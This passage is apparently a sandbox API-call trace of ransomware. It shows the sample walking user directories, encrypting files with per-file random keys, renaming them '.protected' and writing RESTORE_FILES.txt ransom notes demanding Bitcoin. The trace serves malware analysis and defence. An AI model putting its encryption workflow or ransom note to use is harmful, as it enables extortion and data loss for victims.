Player\\#SharedObjects\\P7Y3F7QB\\..") returned 100 [0089.817] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.817] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.817] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.817] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.817] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\RESTORE_FILES.txt") returned 115 [0089.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.818] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.818] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.819] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.819] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.819] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.819] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.819] CloseHandle (hObject=0x150) returned 1 [0089.819] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.819] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.819] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\RESTORE_FILES.txt") returned 106 [0089.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.820] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.820] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.821] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.821] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.821] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.821] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.821] CloseHandle (hObject=0x14c) returned 1 [0089.822] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="Windows") returned -1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="Program Files") returned -1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="Program Files (x86)") returned -1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="$Recycle.bin") returned 1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="System Volume Information") returned -1 [0089.822] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 88 [0089.822] lstrcmpW (lpString1="macromedia.com", lpString2=".") returned 1 [0089.822] lstrcmpW (lpString1="macromedia.com", lpString2="..") returned 1 [0089.822] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned 90 [0089.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.822] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.823] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.823] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.823] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.823] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.823] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.") returned 90 [0089.823] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.823] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.823] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.823] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.823] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.823] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.823] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.823] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\..") returned 91 [0089.823] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.823] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.823] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.823] lstrcmpiW (lpString1="support", lpString2="Windows") returned -1 [0089.823] lstrcmpiW (lpString1="support", lpString2="Program Files") returned 1 [0089.823] lstrcmpiW (lpString1="support", lpString2="Program Files (x86)") returned 1 [0089.823] lstrcmpiW (lpString1="support", lpString2="$Recycle.bin") returned 1 [0089.823] lstrcmpiW (lpString1="support", lpString2="System Volume Information") returned -1 [0089.823] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 96 [0089.823] lstrcmpW (lpString1="support", lpString2=".") returned 1 [0089.823] lstrcmpW (lpString1="support", lpString2="..") returned 1 [0089.824] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned 98 [0089.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.824] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.824] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.824] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.824] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.824] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.824] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.") returned 98 [0089.824] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.824] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.824] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.824] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.824] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.825] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.825] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.825] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\..") returned 99 [0089.825] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.825] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="Windows") returned -1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="Program Files") returned -1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="Program Files (x86)") returned -1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="$Recycle.bin") returned 1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="System Volume Information") returned -1 [0089.825] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 108 [0089.825] lstrcmpW (lpString1="flashplayer", lpString2=".") returned 1 [0089.825] lstrcmpW (lpString1="flashplayer", lpString2="..") returned 1 [0089.825] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned 110 [0089.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0089.828] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.828] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.828] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.828] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.828] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.828] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.") returned 110 [0089.828] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.828] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.828] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.829] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.829] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.829] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.829] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.829] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\..") returned 111 [0089.829] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.829] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.829] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="Windows") returned -1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="Program Files") returned 1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="Program Files (x86)") returned 1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="$Recycle.bin") returned 1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="System Volume Information") returned -1 [0089.829] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 112 [0089.829] lstrcmpW (lpString1="sys", lpString2=".") returned 1 [0089.829] lstrcmpW (lpString1="sys", lpString2="..") returned 1 [0089.829] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned 114 [0089.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0089.829] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.829] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.829] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.829] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.830] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.830] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.") returned 114 [0089.830] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.830] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0089.830] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.830] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.830] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.830] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.830] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.830] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\..") returned 115 [0089.830] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.830] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.830] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="Windows") returned -1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="Program Files") returned 1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="Program Files (x86)") returned 1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="$Recycle.bin") returned 1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="System Volume Information") returned -1 [0089.830] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0089.830] StrStrIW (lpFirst="settings.sol", lpSrch=".protected") returned 0x0 [0089.830] lstrcmpW (lpString1="settings.sol", lpString2="RESTORE_FILES.txt") returned 1 [0089.830] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0089.830] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0089.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0089.831] StrStrW (lpFirst="settings.sol", lpSrch=".txt") returned 0x0 [0089.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0089.832] StrStrW (lpFirst="settings.sol", lpSrch=".rar") returned 0x0 [0089.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0089.832] StrStrW (lpFirst="settings.sol", lpSrch=".zip") returned 0x0 [0089.832] ReadFile (in: hFile=0x15c, lpBuffer=0xce0048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xce0048*, lpNumberOfBytesRead=0x295e064*=0x1d6, lpOverlapped=0x0) returned 1 [0089.833] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffe2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.833] WriteFile (in: hFile=0x15c, lpBuffer=0xce0048*, nNumberOfBytesToWrite=0x1d6, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xce0048*, lpNumberOfBytesWritten=0x295e064*=0x1d6, lpOverlapped=0x0) returned 1 [0089.833] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.833] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0089.833] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0089.834] CloseHandle (hObject=0x15c) returned 1 [0089.834] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.protected") returned 135 [0089.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.protected")) returned 1 [0089.835] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0089.835] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0089.835] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\RESTORE_FILES.txt") returned 130 [0089.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0089.835] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your 